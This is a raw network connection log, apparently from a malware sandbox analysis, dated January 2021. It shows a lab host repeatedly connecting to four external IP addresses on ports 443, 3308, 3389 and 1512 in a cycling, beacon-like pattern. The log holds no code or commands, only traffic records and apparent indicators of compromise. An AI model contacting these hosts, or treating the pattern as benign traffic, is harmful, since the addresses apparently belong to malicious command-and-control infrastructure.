Jan 11, 2021 16:52:43.038558006 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:43.038856983 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:43.046341896 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:43.046485901 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:43.098339081 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:43.098556995 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:43.150502920 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:43.268534899 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:43.268575907 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:43.268749952 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:43.270872116 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:43.322741985 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:43.383291960 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.426603079 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.426763058 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.428757906 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.471774101 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.484764099 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.484786987 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.484929085 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.497405052 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.542973042 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.543205023 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.552341938 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.552758932 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.595798016 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.596069098 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.637053967 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.639139891 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.639158010 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.750653028 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.750678062 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.750884056 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.755182981 CET	49214	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:43.798255920 CET	3308	49214	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:43.863468885 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:43.917927980 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:43.918041945 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:43.919043064 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:43.973829031 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:43.994554996 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:43.994579077 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:43.994630098 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:43.994652987 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.005238056 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.065772057 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.065942049 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.070179939 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.070233107 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.124157906 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.124476910 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.163419962 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.178832054 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.178877115 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.267641068 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.267667055 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.267808914 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.270903111 CET	49215	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:44.324793100 CET	3389	49215	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:44.377695084 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.430469036 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.430555105 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.431390047 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.484164000 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.491485119 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.491514921 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.491617918 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.501576900 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.555676937 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.555982113 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.563575029 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.563745022 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.616482019 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.616692066 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.652605057 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.669579029 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.669598103 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.771553040 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.771605968 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.771892071 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.777501106 CET	49216	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:44.830955029 CET	1512	49216	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:44.892029047 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:44.944793940 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:44.944890022 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:44.945872068 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:44.998490095 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.013258934 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.013334036 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.020587921 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.075452089 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.075598955 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.085963011 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.086486101 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.138634920 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.138715029 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.175712109 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.192115068 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.308006048 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.308186054 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.308207035 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.308264971 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.310797930 CET	49217	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:45.363476992 CET	443	49217	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:45.427125931 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.470787048 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.470957994 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.472549915 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.515582085 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.528690100 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.528714895 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.528842926 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.547156096 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.592036009 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.592267036 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.601298094 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.601500034 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.644598961 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.644855022 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.684016943 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.688210011 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.688242912 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.800461054 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.800486088 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.800676107 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.806288004 CET	49218	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:45.849355936 CET	3308	49218	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:45.926281929 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:45.980212927 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:45.980376959 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:45.981355906 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.035283089 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.062422037 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.062463999 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.062612057 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.073753119 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.137491941 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.137732029 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.146857023 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.146970034 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.201162100 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.201498985 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.241019011 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.255494118 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.255538940 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.347023964 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.347069025 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.347270966 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.353491068 CET	49219	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:46.407433987 CET	3389	49219	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:46.472543955 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.526875973 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.527069092 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.528594971 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.581820965 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.588644981 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.588687897 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.588840961 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.588905096 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.606528044 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.660953999 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.661312103 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.675427914 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.675795078 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.729125977 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.729378939 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.768965006 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.782597065 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.782635927 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.878288031 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.878338099 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:46.878699064 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.884304047 CET	49220	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:46.937493086 CET	1512	49220	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:47.002585888 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.054652929 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.054817915 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.055993080 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.108038902 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.122772932 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.122899055 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.140335083 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.195050955 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.195233107 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.199146986 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.199243069 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.251091003 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.251317024 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.290939093 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.303263903 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.421173096 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.421220064 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.421416044 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.425884962 CET	49221	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:47.478317976 CET	443	49221	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:47.529696941 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.573045015 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.573209047 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.573765039 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.616780996 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.627454042 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.627479076 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.627554893 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.633920908 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.681174994 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.681303978 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.685106039 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.685240030 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.728260040 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.728442907 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.767945051 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.772370100 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.772397041 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.883516073 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.883558035 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.883635044 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.884923935 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.886905909 CET	49222	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:47.930217981 CET	3308	49222	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:47.999902010 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.055365086 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.055459976 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.056328058 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.110390902 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.129225016 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.129272938 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.129446030 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.136967897 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.201131105 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.201226950 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.210330963 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.210513115 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.264946938 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.265099049 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.304579020 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.319716930 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.319747925 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.408664942 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.408699036 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.408860922 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.408890009 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.415056944 CET	49223	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:48.469187021 CET	3389	49223	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:48.531356096 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.584445953 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.584542036 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.586052895 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.639209986 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.646117926 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.646148920 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.646248102 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.646276951 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.662237883 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.716424942 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.716547966 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.726996899 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.727334976 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.780759096 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.780868053 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.816895962 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.833923101 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.833962917 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.933065891 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.933115959 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:48.933410883 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.936589003 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:48.989912987 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:49.046670914 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.098563910 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.098750114 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.099329948 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.151042938 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.165604115 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.165733099 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.180039883 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.234102964 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.234220028 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.239836931 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.240128040 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.291623116 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.291697025 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.343530893 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.460906029 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.460923910 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.461013079 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.463083029 CET	49226	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:49.514647961 CET	443	49226	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:49.572220087 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.615431070 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.615502119 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.616368055 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.659332037 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.670558929 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.670572996 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.670654058 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.683782101 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.728595018 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.728696108 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.797163963 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.797311068 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.840291977 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.840507030 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:49.880019903 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.883451939 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.883464098 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.996738911 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.996754885 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:49.997005939 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:50.002811909 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:50.045711994 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:50.123270035 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.176691055 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.176804066 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.177823067 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.231462002 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.246738911 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.246758938 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.246870995 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.261408091 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.322494030 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.322921991 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.360340118 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.360390902 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.413964033 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.414210081 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.453428030 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.467706919 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.467753887 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.560452938 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.560506105 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.560745001 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.560858011 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.566418886 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:50.621279001 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:50.684742928 CET	49230	1512	192.168.2.22	46.105.131.65
